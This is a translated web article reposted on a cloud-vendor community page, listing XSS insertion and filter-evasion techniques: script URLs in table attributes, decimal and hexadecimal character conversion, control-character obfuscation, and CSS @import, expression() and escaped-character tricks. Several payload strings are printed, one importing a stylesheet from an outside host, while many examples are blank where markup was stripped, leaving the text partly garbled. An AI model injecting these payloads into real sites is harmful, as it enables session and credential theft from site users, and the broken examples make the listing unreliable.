Home > Others

XSS code trigger conditions, common methods for inserting XSS code

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1. Script Insertion

(1) Insert JavaScript and VBScript normal characters.

Example 1:

Example 2:<table background= "Javascript:alert (/xss/)" ></table> "/inserting a script in a table

Example 3:

(2) Convert character type. convert any or all of the characters in JavaScript or VBScript to decimal or hexadecimal characters

Example 1: "/convert J character to decimal character J.

Example 2: "/convert J character to hexadecimal character J.

(3) inserting confusing characters. in the system control character, except for the head & #00 (NULL) and the tail (DEL), the other 31 characters can be used as obfuscation characters, such as, and so on can be inserted into the

The head of JavaScript or VBScript where tab characters, line feeds, and carriage returns can also be inserted anywhere in the code.

Example 1: "/INSERT into the code header, which can be written as the effect

Example 2: "/inserted anywhere in the code, which can be written as

Example 3: "/is a 16-binary form of carriage return

Example 4: "/is a 16 binary form of line break

2. Style Sheets

(1) using CSS code @import, expression trigger XSS vulnerability.

Example 1: @import "HTTP://WEB/XSS.CSS"; ' Import a CSS style sheet with external XSS code.

Example 2: @import ' Javascript:alert ("XSS"); ' Invoke JavaScript script trigger vulnerability

Example 3:body{xss:expression (' XSS ')} ' adding an expression event to an internal style sheet

Example 4:

(2) Adding JavaScript and VBScript scripts to CSS code

Example 1:body{background-image:url (Javascript:alert ("XSS"))}

Example 2:body{background-image:url (Vbscript:msgbox ("XSS"))}

(3) Convert character types, substituting hexadecimal characters for one or all of the characters:

Example 1:@\0069mport:url (WEB/1.CSS); ' Convert the I to \0069

Example 2:body{xss:\0065xpression (Alert (' XSS ')} '//convert E to \0065

Example 3:body{background-image:\0075\0072\006c ...} ' Convert URLs to 16 binary

(4) Inserting obfuscation characters, in CSS,/**/is a comment character, except/**/, the characters "\" and Terminator "\0″ are also ignored and can be used to confuse characters.

Example 1:@\0im\port ' \0ja\vasc\ript:alert ("XSS") ';

Example 2:@\i\0m\00p\000o\0000\00000r\000000t "url";

XSS code trigger conditions, common methods for inserting XSS code

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
htmlentities xss xss bug xss prevention xss protection xss vectors xss example xss injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More